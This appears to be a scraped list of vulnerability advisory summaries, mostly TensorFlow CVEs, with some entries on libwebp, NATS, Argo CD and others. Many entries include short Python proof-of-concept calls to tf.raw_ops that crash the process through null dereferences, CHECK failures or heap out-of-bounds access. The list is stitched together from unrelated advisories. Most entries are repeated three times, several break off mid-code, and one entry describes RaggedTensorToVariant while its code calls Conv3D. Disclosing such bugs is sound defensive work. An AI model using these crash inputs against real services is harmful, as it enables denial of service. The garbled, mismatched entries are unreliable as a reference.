Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors results in null pointer dereferences. There are multiple ways to reproduce this, listing a few examples here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …
The implementation of ParseAttrValue can be tricked into a stack overflow due to recursion by providing a specially crafted input.
The implementation of ParseAttrValue can be tricked into a stack overflow due to recursion by providing a specially crafted input.
The implementation of ParseAttrValue can be tricked into a stack overflow due to recursion by providing a specially crafted input.
TFLite graphs must not have loops between nodes. However, this condition was not checked, and an attacker could craft models that would result in an infinite loop during evaluation. In certain cases, the infinite loop would be replaced by a stack overflow due to too many recursive calls.
TFLite graphs must not have loops between nodes. However, this condition was not checked, and an attacker could craft models that would result in an infinite loop during evaluation. In certain cases, the infinite loop would be replaced by a stack overflow due to too many recursive calls.
TFLite graphs must not have loops between nodes. However, this condition was not checked, and an attacker could craft models that would result in an infinite loop during evaluation. In certain cases, the infinite loop would be replaced by a stack overflow due to too many recursive calls.
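A minimal sketch of the kind of cycle check that was missing, expressed over a plain Python adjacency map rather than the TFLite model format; the example graphs are illustrative.

def has_cycle(edges):
    # edges maps a node to the nodes it feeds; a depth-first walk that
    # revisits a node already on the current path has found a loop.
    visiting, done = set(), set()

    def visit(node):
        if node in done:
            return False
        if node in visiting:
            return True  # re-entered a node on the current path: a loop
        visiting.add(node)
        if any(visit(nxt) for nxt in edges.get(node, ())):
            return True
        visiting.remove(node)
        done.add(node)
        return False

    return any(visit(node) for node in edges)

print(has_cycle({0: [1], 1: [2], 2: [0]}))  # True: evaluation would never terminate
print(has_cycle({0: [1], 1: [2]}))          # False: a valid acyclic graph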
In eager mode (default in TF 2.0 and later), session operations are invalid. However, users could still call the raw ops associated with them and trigger a null pointer dereference: import tensorflow as tf tf.raw_ops.GetSessionTensor(handle=['\x12\x1a\x07'],dtype=4) import tensorflow as tf tf.raw_ops.DeleteSessionTensor(handle=['\x12\x1a\x07'])
In eager mode (default in TF 2.0 and later), session operations are invalid. However, users could still call the raw ops associated with them and trigger a null pointer dereference: import tensorflow as tf tf.raw_ops.GetSessionTensor(handle=['\x12\x1a\x07'],dtype=4) import tensorflow as tf tf.raw_ops.DeleteSessionTensor(handle=['\x12\x1a\x07'])
In eager mode (default in TF 2.0 and later), session operations are invalid. However, users could still call the raw ops associated with them and trigger a null pointer dereference: import tensorflow as tf tf.raw_ops.GetSessionTensor(handle=['\x12\x1a\x07'],dtype=4) import tensorflow as tf tf.raw_ops.DeleteSessionTensor(handle=['\x12\x1a\x07'])
The yoast_seo (aka Yoast SEO) extension before 7.2.1 for TYPO3 allows SSRF via a backend user account.
Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") … Segmentation fault
Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") … Segmentation fault
Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") … Segmentation fault
Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault being thrown out from the standard library as std::vector invariants are broken. import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)
Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault being thrown out from the standard library as std::vector invariants are broken. import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)
Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault being thrown out from the standard library as std::vector invariants are broken. import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)
Passing invalid arguments (e.g., discovered via fuzzing) to tf.raw_ops.SparseCountSparseOutput results in a segfault.
Passing invalid arguments (e.g., discovered via fuzzing) to tf.raw_ops.SparseCountSparseOutput results in a segfault.
Passing invalid arguments (e.g., discovered via fuzzing) to tf.raw_ops.SparseCountSparseOutput results in a segfault.
Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults: import tensorflow as tf inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], shape=[8], dtype=tf.int32) beam_width = 10 top_paths = 3 merge_repeated = True tf.raw_ops.CTCBeamSearchDecoder( inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, top_paths=top_paths, merge_repeated=merge_repeated)
Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults: import tensorflow as tf inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], shape=[8], dtype=tf.int32) beam_width = 10 top_paths = 3 merge_repeated = True tf.raw_ops.CTCBeamSearchDecoder( inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, top_paths=top_paths, merge_repeated=merge_repeated)
Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults: import tensorflow as tf inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], shape=[8], dtype=tf.int32) beam_width = 10 top_paths = 3 merge_repeated = True tf.raw_ops.CTCBeamSearchDecoder( inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, top_paths=top_paths, merge_repeated=merge_repeated)
The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …
The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …
The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …
The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null: import tensorflow as tf d = tf.convert_to_tensor([],dtype=tf.float32) p = tf.convert_to_tensor([],dtype=tf.float32) tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.
The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null: import tensorflow as tf d = tf.convert_to_tensor([],dtype=tf.float32) p = tf.convert_to_tensor([],dtype=tf.float32) tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.
The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null: import tensorflow as tf d = tf.convert_to_tensor([],dtype=tf.float32) p = tf.convert_to_tensor([],dtype=tf.float32) tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.
An attacker can trigger undefined behavior by binding to null pointer in tf.raw_ops.ParameterizedTruncatedNormal: import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxvals = tf.constant((1), dtype=tf.float32) tf.raw_ops.ParameterizedTruncatedNormal( shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)
An attacker can trigger undefined behavior by binding to null pointer in tf.raw_ops.ParameterizedTruncatedNormal: import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxvals = tf.constant((1), dtype=tf.float32) tf.raw_ops.ParameterizedTruncatedNormal( shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)
An attacker can trigger undefined behavior by binding to null pointer in tf.raw_ops.ParameterizedTruncatedNormal: import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxvals = tf.constant((1), dtype=tf.float32) tf.raw_ops.ParameterizedTruncatedNormal( shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)
A security-sensitive bug was discovered by Open Source Developer Erik Sundell of Sundell Open Source Consulting AB. The functions RandomAlphaNumeric(int) and CryptoRandomAlphaNumeric(int) are not as random as they should be.
A security-sensitive bug was discovered by Open Source Developer Erik Sundell of Sundell Open Source Consulting AB. The functions RandomAlphaNumeric(int) and CryptoRandomAlphaNumeric(int) are not as random as they should be. Small values of int in the functions above will return a smaller subset of results than they should. For example, RandomAlphaNumeric(1) will always return a digit in the 0-9 range, while RandomAlphaNumeric(4) will return around ~7 million of the ~13M …
Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.
The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service. import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)
The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service. import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)
The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service. import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)
A heap-based buffer overflow in function WebPDecodeRGBInto is possible due to an invalid check for buffer size. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
An out-of-bounds read was found in function ChunkVerifyAndAssign. The highest threat from this vulnerability is to data confidentiality and to the service availability.
An out-of-bounds read was found in function ChunkAssignData. The highest threat from this vulnerability is to data confidentiality and to the service availability.
The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …
The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …
The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …
Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) import tensorflow as tf input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 2, …
Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) import tensorflow as tf input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 2, …
Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) import tensorflow as tf input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 2, …
The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …
The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …
The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …
An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams: import tensorflow as tf data=tf.constant([''] * 11, shape=[11], dtype=tf.string) splits = [0]*115 splits.append(3) data_splits=tf.constant(splits, shape=[116], dtype=tf.int64) tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss', ngram_widths=[7,6,11], left_pad='ABCDE', right_pad=b'ZYXWVU', pad_width=50, preserve_short_sequences=True)
An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) dense_shape = tf.constant([], shape=[0], dtype=tf.int64) default_value = 0 tf.raw_ops.SparseFillEmptyRows( indices=indices, values=values, dense_shape=dense_shape, default_value=default_value)
An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance: import tensorflow as tf hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64) hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32) hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64) truth_values = tf.constant([], shape=[0], dtype=tf.float32) truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) tf.raw_ops.EditDistance( hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values, hypothesis_shape=hypothesis_shape, truth_indices=truth_indices, truth_values=truth_values, truth_shape=truth_shape, normalize=True)
The implementation of TrySimplify has undefined behavior due to dereferencing a null pointer in corner cases that result in optimizing a node with no inputs.
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26521.txt) Problem Description The NATS account system has an Operator trusted by the servers, which signs Accounts, and each Account can then create and sign Users within their account. The Operator should be able to safely issue Accounts to other entities which it does not fully trust. A malicious Account could create and sign a User JWT with a state not created by the normal tooling, …
Passing an empty image to tf.raw_ops.DrawBoundingBoxesV2 lets an attacker trigger a denial of service via a CHECK failure: import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)
Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data: import tensorflow as tf indices = tf.constant([], shape=[10, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) shape = tf.constant([0, 0], shape=[2], dtype=tf.int64) dense = tf.constant([], shape=[0], dtype=tf.int64) tf.raw_ops.SparseDenseCwiseMul( sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)
An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape = [1, 1] st = tf.SparseTensor(indices_array, value_array, dense_shape) input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape) permutation = tf.constant([], shape=[1, 0], dtype=tf.int32) tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)
The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for axis argument: import tensorflow as tf input_tensor = tf.constant([0.0], shape=[1], dtype=float) input_min = tf.constant(-10.0) input_max = tf.constant(-10.0) tf.raw_ops.QuantizeAndDequantizeV2( input=input_tensor, input_min=input_min, input_max=input_max, signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)
The implementation of tf.io.decode_raw produces incorrect results and crashes the Python interpreter when combining fixed_length and wider datatypes. import tensorflow as tf tf.io.decode_raw(tf.constant(["1","2","3","4"]), tf.uint16, fixed_length=4)
The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; return sizeof(dummy) + sizeof(dummy.data[0]) * size; } An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in an invalid value being given to malloc: TfLiteIntArray* TfLiteIntArrayCreate(int size) { TfLiteIntArray* ret = …
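The following plain-Python sketch (not TensorFlow code; the struct and element sizes are assumed values) emulates the 32-bit arithmetic in TfLiteIntArrayGetSizeInBytes to show how a large attacker-chosen size wraps the byte count to a negative number:
# Emulate C's 32-bit signed int arithmetic in plain Python.
def to_int32(x):
    x &= 0xFFFFFFFF
    return x - 0x100000000 if x >= 0x80000000 else x

HEADER_BYTES = 8      # stand-in for sizeof(TfLiteIntArray); illustrative assumption
ELEMENT_BYTES = 4     # stand-in for sizeof(dummy.data[0]); illustrative assumption
size = 1_000_000_000  # attacker-controlled element count read from the model

total = to_int32(HEADER_BYTES + ELEMENT_BYTES * size)
print(total)  # -294967288: a negative byte count that is then handed to malloc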
The TFLite implementation of concatenation is vulnerable to an integer overflow issue: for (int d = 0; d < t0->dims->size; ++d) { if (d == axis) { sum_axis += t->dims->data[axis]; } else { TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); } } An attacker can craft a model such that the dimensions of one of the concatenation inputs overflow the values of int. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …
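As an illustration of the same class of problem (plain Python emulating the 32-bit accumulator, not TFLite code), summing attacker-chosen dimensions along the concatenation axis can wrap sum_axis to a negative value, so the output tensor is sized from a bogus total:
def to_int32(x):
    x &= 0xFFFFFFFF
    return x - 0x100000000 if x >= 0x80000000 else x

# Hypothetical per-input extents along the concatenation axis, chosen so the
# 32-bit running total overflows.
axis_dims = [2_000_000_000, 2_000_000_000]
sum_axis = 0
for d in axis_dims:
    sum_axis = to_int32(sum_axis + d)
print(sum_axis)  # -294967296: the wrapped value used to size the output buffer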
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26892.txt ) Problem Description NATS nats-server through 2020-10-07 has Incorrect Access Control because of how expired credentials are handled. The NATS accounts system has expiration timestamps on credentials; the https://github.com/nats-io/jwt library had an API which encouraged misuse and an IsRevoked() method which misused its own API. A new IsClaimRevoked() method has correct handling and the nats-server has been updated to use this. The old IsRevoked() method …
A privilege escalation vulnerability impacting the Google Exposure Notification Verification Server (versions prior to 0.23.1), allows an attacker who (1) has UserWrite permissions and (2) is using a carefully crafted request or malicious proxy, to create another user with higher privileges than their own. This occurs due to insufficient checks on the allowed set of permissions. The new user creation event would be captured in the Event Log.
TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices. This is because the implementation does a double redirection to access an element of an array allocated on the heap. If the value at indices + 1 is outside the bounds of csr_row_ptr, this results in writing outside of bounds of …
Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap: import tensorflow as tf inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32) labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64) labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32) sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32) tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, labels_values=labels_values, sequence_length=sequence_length, preprocess_collapse_repeated=True, ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True) An attacker can also trigger a heap buffer overflow: import tensorflow as tf inputs = tf.constant([], shape=[7, 2, …
Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure. import tensorflow as tf input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64) input_shape = tf.zeros([11], dtype=tf.int64) new_shape = tf.zeros([1], dtype=tf.int64) tf.raw_ops.SparseReshape(input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)
Incomplete validation in SparseAdd allows attackers to trigger undefined behavior (dereferencing null pointers) as well as writes outside the bounds of heap allocated data: import tensorflow as tf a_indices = tf.zeros([10, 97], dtype=tf.int64) a_values = tf.zeros([10], dtype=tf.int64) a_shape = tf.zeros([0], dtype=tf.int64) b_indices = tf.zeros([0, 0], dtype=tf.int64) b_values = tf.zeros([0], dtype=tf.int64) b_shape = tf.zeros([0], dtype=tf.int64) thresh = 0 tf.raw_ops.SparseAdd(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=thresh)
Lotus is an implementation of the Filecoin protocol written in Go. BLS signature validation in lotus uses the blst library method VerifyCompressed. This method accepts signatures in 2 forms: "serialized" and "compressed", meaning that BLS signatures can be provided as either of 2 unique byte arrays. Lotus block validation functions perform a uniqueness check on provided blocks. Two blocks are considered distinct if the CIDs of their blockheader do not match. …
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in github.com/cilium/cilium.
The package github.com/argoproj/argo-cd/cmd before 1.7.13 and from 1.8.0 before 1.8.6 is vulnerable to Cross-site Scripting (XSS): the SSO provider connected to Argo CD would have to send back a malicious error message containing JavaScript to the user.
Apache Camel's JMX is vulnerable to a rebind flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.x, and 3.0.0 up to 3.1.0 are affected. Users should upgrade to 3.2.0.
Syncthing is a continuous file synchronization program. In Syncthing before version 1.15.0, the relay server strelaysrv can be caused to crash and exit by sending a relay message with a negative length field. Similarly, Syncthing itself can crash for the same reason if given a malformed message from a malicious relay server when attempting to join the relay. Relay joins are essentially random (from a subset of low latency relays) …
When reading a file, libwebp allocates an excessive amount of memory. The highest threat from this vulnerability is to the service availability.
TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad. This is because the implementation does not validate the rank of the input_* tensors. In turn, this results in the tensors being passed as they are to QuantizeAndDequantizePerChannelGradientImpl. However, the vec<T> method requires the rank to be 1 and triggers a CHECK failure otherwise. The fix will be …
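A hypothetical invocation along the lines the advisory describes, passing input_min and input_max tensors whose rank is not 1 (the specific values and shapes are assumptions for illustration):
import tensorflow as tf
# Illustrative call: input_min and input_max have rank 2 rather than the rank-1
# tensors the per-channel gradient path expects, so the missing rank validation
# leads to a CHECK failure and a crash.
gradients = tf.constant([0.0], shape=[1], dtype=tf.float32)
inputs = tf.constant([0.0], shape=[1], dtype=tf.float32)
input_min = tf.constant([[0.0]], shape=[1, 1], dtype=tf.float32)
input_max = tf.constant([[0.0]], shape=[1, 1], dtype=tf.float32)
tf.raw_ops.QuantizeAndDequantizeV4Grad(gradients=gradients, input=inputs, input_min=input_min, input_max=input_max, axis=0)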
